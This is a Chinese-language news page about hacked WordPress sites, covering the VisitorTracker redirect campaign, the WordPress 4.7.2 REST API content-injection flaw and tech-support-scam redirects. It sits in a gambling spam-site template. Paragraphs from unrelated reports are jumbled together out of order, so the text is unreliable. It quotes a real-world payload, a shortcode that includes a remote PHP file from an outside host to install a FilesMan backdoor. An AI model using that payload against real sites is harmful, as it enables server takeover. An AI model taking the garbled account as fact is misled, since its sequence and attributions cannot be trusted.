美高梅官方网站66159

美高梅线上平台游戏以便日后访问并修改网站的代码,服务器尝试使用多种不同的漏洞利用方法去感染访问者的电脑

作者:新闻公告    来源:未知    发布时间:2020-04-21 17:36    浏览量:

安全公司Sucuri报告,攻击者正在劫持数千WordPress网站去感染没有疑心的访问者。攻击始于15天前,但在本周的48小时内,攻击者入侵的网站数量从1000飙升到了6000。遭到劫持的网站被用于将用户重定向到一个托管攻击代码的服务器,服务器尝试使用多种不同的漏洞利用方法去感染访问者的电脑。安全研究人员怀疑,攻击者利用了某些WordPress插件的漏洞入侵网站。Sucuri将这起攻击行动命名为VisitorTracker,原因是一个恶意 javascript文件使用的函数名是visitorTracker_isMob(),它向网站管理员提供了一个扫描工具检查是否被入侵了。

1月26日,WordPress团队发布了WordPress 4.7.2,其中包含一个解决WordPress REST API中的漏洞的秘密修复,影响到REST API——来自Sucuri的安全研究人员最先发现该漏洞。未经授权的攻击者利用该漏洞可注入恶意内容,以及进行提权,对文章、页面等内容进行修改。REST API是最近添加到WordPress 4.7.0并默认启用的。

据来自 Sucuri 和 Malwarebytes 的安全研究员称,本月有成千上万的的 WordPress 网站遭到黑客入侵并被恶意代码攻击。尽管这些事件的入口似乎都不同,但都遵循类似的模式 —— 从已知威胁者处加载恶意代码。

转载自:solidot.org

漏洞发现者Sucuri介绍,这个缺陷影响WordPress 4.7.0和4.7.1,并允许攻击者制作恶意HTTP请求,当发送到一个WordPress网站将允许黑客绕过身份验证方法,并更改博客帖子的标题和内容和静态 页面。

研究人员认为入侵者正在想办法获取访问这些网站的机会,他们不是利用 WordPress CMS 本身的漏洞,而是利用过时的主题和插件中的漏洞。当获得对网站的访问权限时,他们会建立一个后门,以便日后访问并修改网站的代码。

简单来说,攻击者发现了通过REST API缺陷将自己的PHP代码发送到WordPress站点的方法,直到那时它才被用于改变原有的文本。

在多数情况下,他们会修改 PHP 或 JavaScript 文件以加载恶意代码,尽管有些用户报告记录了他们对数据库表的修改。

content:"[insert_php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/insert_php]
[php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/php]",
"id":"61a"}

美高梅线上平台游戏 1

在实时攻击中看到的上述源代码片段将告诉WordPress引擎在每次用户访问该特定页面时执行以下PHP命令,如果黑客插入木马或其他恶意脚本,影响将会扩大。

Malwarebytes 安全研究员 JérômeSegura 表示,这种恶意代码会筛选访问过受感染网站的用户,并将一些用户重定向到技术支持诈骗网站。其中一些技术支持骗局正是利用 Google Chrome 的 “evil cursor” 漏洞,阻止用户关闭恶意网站。

include('http[:]//acommeamour.fr/tmp/xx.php');

这场 WordPress 网站劫持活动于本月开始,并在最近几天加剧。将这次攻击的 JavaScript 恶意代码片断放到搜索引擎搜索,会有超过 2,500 个结果。而这只被黑客攻击的网站总数的一小部分。

这行PHP代码将在受害者的站点上包含一个远程PHP文件,它将在WordPress / wp-content / uploads /文件夹中下载并安装FilesMan PHP后门。

美高梅线上平台游戏 2

在将其HTTP请求发送到站点的WordPress REST API后,攻击者只需访问一次损坏的页面,然后访问后门并接管受害者的底层服务器。

编译自:zdnet

鉴于WordPress使用的广泛性,该漏洞的影响还是比较大的。使用 WordPress REST API 是简便高效的通过 JSON 格式传输数据访问或控制 WordPress 站点内容的方法。API 提供了对用户、文章、分类等不同功能的控制,也可以通过 API 检索或修改文章。Wordpress REST API 插件在 4.70 集成到 WordPress 中,由于权限控制失效导致内容注入或修改。WordPress开发团队已经与Sucuri配合在最新的4.7.2版本中修复了该漏洞。

(文/开源中国)    

参考来源:

(文/开源中国)    

上一篇:没有了

更多新闻推荐

Copyright © 2015-2019 http://www.77zhth.net. 美高梅官方网站66159有限公司 版权所有